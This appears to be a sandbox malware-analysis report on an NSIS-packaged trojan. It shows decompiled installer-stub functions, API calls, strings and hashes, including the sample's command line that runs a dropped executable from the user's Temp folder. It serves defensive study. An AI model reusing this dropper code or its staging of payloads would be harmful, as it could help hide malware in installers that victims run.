0x00403265
0x00403277
0x00000000
0x00000000
0x00000000
0x00000000
0x0040315e
0x0040315e
0x00403163
0x00403167
0x0040316e
0x00403175
0x00403177
0x00403177
0x00403186
0x004032e6
0x00403328
0x00000000
0x00403328
0x00403192
0x00403216
0x00403219
0x0040321e
0x00000000
0x00403216
0x0040319f
0x004031a4
0x004031ac
0x004031d2
0x004031e1
0x004031e7
0x004031ec
0x004031f2
0x00000000
0x00000000
0x004031fc
0x00403204
0x00403207
0x0040320c
0x0040320e
0x0040320e
0x00000000
0x00000000
0x00000000
0x00000000
0x004031fc
0x0040321f
0x00403225
0x00403235
0x00403235
0x00403238
0x0040323e
0x0040323e
0x00000000
0x0040315e

APIs

GetTickCount.KERNEL32 ref: 004030E4
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe,00000400), ref: 00403100

Part of subcall function 0040615E: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe,80000000,00000003), ref: 00406162
Part of subcall function 0040615E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184

GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe,80000000,00000003), ref: 00403149
GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328E

Strings

Inst, xrefs: 004031B7
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032DA
C:\Users\user\AppData\Local\Temp\, xrefs: 004030DA, 0040329C
Null, xrefs: 004031C9
soft, xrefs: 004031C0
Error launching installer, xrefs: 00403120
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403328
C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe, xrefs: 004030EA, 004030F9, 0040310D, 0040312A
C:\Users\user\Desktop, xrefs: 0040312B, 00403130, 00403136

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-714021740
Opcode ID: 323c9084f4495cb75f4cf70951988b51dd1d9d869199bcaf0981bfe9882d4e48
Instruction ID: 583a998f33a1e047253031f1d22d0aa602d55a867c39f8e0fceec447792fd132
Opcode Fuzzy Hash: 323c9084f4495cb75f4cf70951988b51dd1d9d869199bcaf0981bfe9882d4e48
Instruction Fuzzy Hash: 0671E171940204ABCB20DFA5EE85A9E3FA8AB11316F10817FF900B62D1DB7C9E418B5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405FB4( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"C:\\U";
				if(_t35 == 0) {
					lstrcatW(E00405F3D(E0040666E(_t81, L"C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
				} else {
					E0040666E();
				}
				E004068F5(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E004069A4(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406139(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E0040615E(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004056D0(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x7a8b28;
						goto L32;
					} else {
						E0040666E(0x40b5f8, _t83);
						E0040666E(_t83, _t81);
						E004066AB(_t77, _t81, _t83, "C:\Users\jones\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
						E0040666E(_t83, 0x40b5f8);
						_t64 = E00405CCE("C:\Users\jones\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x7a8b28 =  &( *0x7a8b28->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E004056D0();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004056D0(0xffffffea,  *(_t86 - 8));
				 *0x7a8b54 =  *0x7a8b54 + 1;
				_t45 = E00403377(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x7a8b54 =  *0x7a8b54 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E004066AB(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E004066AB(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405CCE();
					goto L29;
				}
				goto L33;
			}

0x0040176f
0x00401776
0x00401782
0x00401785
0x0040178a
0x0040178d
0x00401794
0x004017b0
0x00401796
0x00401797
0x00401797
0x004017b6
0x004017bb
0x004017bb
0x004017bf
0x004017c2
0x004017c7
0x004017c9
0x004017cb
0x004017d0
0x004017d0
0x004017db
0x004017db
0x004017ec
0x004017ee
0x004017ee
0x004017ef
0x004017ef
0x004017f2
0x004017f5
0x004017f8
0x004017f8
0x004017ff
0x0040180e
0x00401813
0x00401816
0x00401819
0x00000000
0x00000000
0x0040181b
0x0040181e
0x00401874
0x00401879
0x004015b6
0x0040292e
0x0040292e
0x00402c2a
0x00402c2d
0x00402c2d
0x00000000
0x00401820
0x00401826
0x0040182d
0x0040183a
0x00401845
0x0040185b
0x0040185b
0x0040185e
0x00000000
0x00401864
0x00401864
0x00401865
0x00401882
0x00402c33
0x00402c33
0x00402c33
0x00401867
0x00401867
0x00401868
0x00401493
0x0040239d
0x0040239d
0x0040239d
0x00401865
0x0040185e
0x00402c35
0x00402c39
0x00402c39
0x00401892
0x00401897
0x004018a5
0x004018aa
0x004018b0
0x004018b4
0x004018b6
0x004018be
0x004018ca
0x004018b8
0x004018b8
0x004018bc
0x00000000
0x00000000
0x004018bc
0x004018d3
0x004018d9
0x004018db
0x00000000
0x004018e1
0x004018e1
0x004018e4
0x004018fc
0x004018e6
0x004018e9
0x004018f2
0x004018f2
0x00401901
0x00401906
0x00402398
0x00000000
0x00402398
0x00000000

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,00000000,00000000,C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5

Part of subcall function 0040666E: lstrcpynW.KERNEL32(?,?,00000400,004037B6,007A7AA0,NSIS Error), ref: 0040667B

Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
Part of subcall function 004056D0: lstrcatW.KERNEL32(007A0F68,004030A8), ref: 0040572B
Part of subcall function 004056D0: SetWindowTextW.USER32(007A0F68,007A0F68), ref: 0040573D
Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401835, 00401851
C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl, xrefs: 0040178D, 00401796, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Users\user\AppData\Local\Temp, xrefs: 0040179E

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl
API String ID: 1941528284-3542872641
Opcode ID: c88ed36c007d22437061545d9d5dec38a2b75a4754de15431c99bf9f19713014
Instruction ID: c895feda3e823d9c0bc0fb7144dfd3dc41df657037fc16576ccee127d24ab7e8
Opcode Fuzzy Hash: c88ed36c007d22437061545d9d5dec38a2b75a4754de15431c99bf9f19713014
Instruction Fuzzy Hash: CB41D571800108BACF11BBB5DD85DAE7679EF45328F20463FF422B11E1DB3D89619A2E

Uniqueness

Uniqueness Score: -1.00%

Function 0040347F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E0040347F(intOrPtr _a4) {
				intOrPtr _t11;
				signed int _t12;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t30;
				intOrPtr _t33;
				intOrPtr _t35;
				void* _t36;
				intOrPtr _t48;

				_t33 =  *0x79f734 -  *0x40ce60 + _a4;
				 *0x7a8aac = GetTickCount() + 0x1f4;
				if(_t33 <= 0) {
					L22:
					E0040302E(1);
					return 0;
				}
				E004035FE( *0x79f744);
				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
				 *0x79f740 = _t33;
				 *0x79f730 = 0;
				while(1) {
					_t30 = 0x4000;
					_t11 =  *0x79f738 -  *0x79f744;
					if(_t11 <= 0x4000) {
						_t30 = _t11;
					}
					_t12 = E004035E8(0x793730, _t30);
					if(_t12 == 0) {
						break;
					}
					 *0x79f744 =  *0x79f744 + _t30;
					 *0x40ce68 = 0x793730;
					 *0x40ce6c = _t30;
					L6:
					L6:
					if( *0x7a8ab0 != 0 &&  *0x7a8b40 == 0) {
						 *0x79f730 =  *0x79f740 -  *0x79f734 - _a4 +  *0x40ce60;
						E0040302E(0);
					}
					 *0x40ce70 = 0x78b730;
					 *0x40ce74 = 0x8000;
					if(E00406B96(?str?) < 0) {
						goto L20;
					}
					_t35 =  *0x40ce70; // 0x78e728
					_t36 = _t35 - 0x78b730;
					if(_t36 == 0) {
						__eflags =  *0x40ce6c; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t30;
						if(_t30 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x79f734;
						if(_t16 -  *0x40ce60 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E00406210( *0x40a01c, 0x78b730, _t36); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40ce60 =  *0x40ce60 + _t36;
					_t48 =  *0x40ce6c; // 0x0
					if(_t48 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}

0x0040348f
0x004034a2
0x004034a7
0x004035d7
0x004035d9
0x00000000
0x004035df
0x004034b3
0x004034c6
0x004034cc
0x004034d2
0x004034dd
0x004034e2
0x004034e7
0x004034ef
0x004034f1
0x004034f1
0x004034fa
0x00403501
0x00000000
0x00000000
0x00403507
0x0040350d
0x00403513
0x00000000
0x00403519
0x0040351f
0x0040353f
0x00403544
0x00403549
0x0040354f
0x00403555
0x00403566
0x00000000
0x00000000
0x00403568
0x0040356e
0x00403570
0x00403593
0x00403599
0x00000000
0x00000000
0x0040359b
0x0040359d
0x00000000
0x00000000
0x0040359f
0x0040359f
0x004035b2
0x00000000
0x00000000
0x004035c1
0x00000000
0x004035c1
0x0040357a
0x00403581
0x004035ce
0x004035d4
0x004035d4
0x00000000
0x004035d4
0x00403583
0x00403589
0x0040358f
0x00000000
0x00000000
0x00000000
0x004035d2
0x004035d2
0x00000000
0x004035d2
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00403493

Part of subcall function 004035FE: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FC,?), ref: 0040360C

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A9,00000004,00000000,00000000,?,?,00403323,000000FF,00000000,00000000,?,?), ref: 004034C6
SetFilePointer.KERNELBASE(?,00000000,00000000,0jy,00793730,00004000,?,00000000,004033A9,00000004,00000000,00000000,?,?,00403323,000000FF), ref: 004035C1

Strings

(x, xrefs: 0040354F, 00403568
07y, xrefs: 004034F3
0jy, xrefs: 0040350D, 0040354A

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FilePointer$CountTick
String ID: (x$07y$0jy
API String ID: 1092082344-2769961627
Opcode ID: 5ef9f3cf75525ab0b28f5e9a18968e2fb4815e048a68f3a4626f05087b93d5e0
Instruction ID: fa4fce997e9b0d1f670701ff0d5ea0446f36afc43afd7a1273bf0b0fb6409833
Opcode Fuzzy Hash: 5ef9f3cf75525ab0b28f5e9a18968e2fb4815e048a68f3a4626f05087b93d5e0
Instruction Fuzzy Hash: 6E31AEB2510215EFCB209F69FE8492A3BADF74475A714423BE401B22F0DB795D02CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 004069CB Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004069CB(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}

0x004069e2
0x004069eb
0x004069ed
0x004069ed
0x004069f1
0x00406a04
0x004069fe
0x004069fe
0x004069fe
0x00406a1d
0x00406a31
0x00406a38

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069E2
wsprintfW.USER32 ref: 00406A1D
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A31

Strings

UXTHEME, xrefs: 004069D4
\, xrefs: 004069F3
%s%S.dll, xrefs: 00406A17

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
Instruction ID: edb644a17e19fa0d5d66c6da3b257654e99a3b388903ea93700411201bdfbebd
Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
Instruction Fuzzy Hash: 37F0F671600219A7DB14BB64DD0EF9B376CAB00304F11447AA646F10D0FB7CDB68CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00405B9F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405B9F(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x00405baa
0x00405bae
0x00405bb1
0x00405bb7
0x00405bbb
0x00405bbf
0x00405bc7
0x00405bce
0x00405bd4
0x00405bdb
0x00405be2
0x00405bea
0x00405bec
0x00000000
0x00405bec
0x00405bf6
0x00405bfd
0x00405c13
0x00000000
0x00000000
0x00000000
0x00405c15
0x00405c19

APIs

CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BE2
GetLastError.KERNEL32 ref: 00405BF6
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C0B
GetLastError.KERNEL32 ref: 00405C15

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405BC5

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3449924974-3081826266
Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
Instruction ID: a4b5b825bdd4266eac6b0ee8a32438dce20ed58698919e53373cd8165130f89a
Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
Instruction Fuzzy Hash: 31010871D04219EAEF009BA0C944BEFBFB8EF04314F00403AD545B6191E7799A48CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0040618D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040618D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a5ac; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}

0x00406193
0x00406199
0x0040619a
0x0040619a
0x0040619f
0x004061a0
0x004061a3
0x004061a8
0x004061ab
0x004061b5
0x004061c2
0x004061c6
0x004061ce
0x00000000
0x00000000
0x004061d2
0x00000000
0x004061d4
0x004061d4
0x004061d4
0x004061d7
0x004061da
0x004061da
0x004061dd
0x00000000

APIs

GetTickCount.KERNEL32 ref: 004061AB
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,00403644,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 004061C6

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00406192
nsa, xrefs: 0040619A

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin
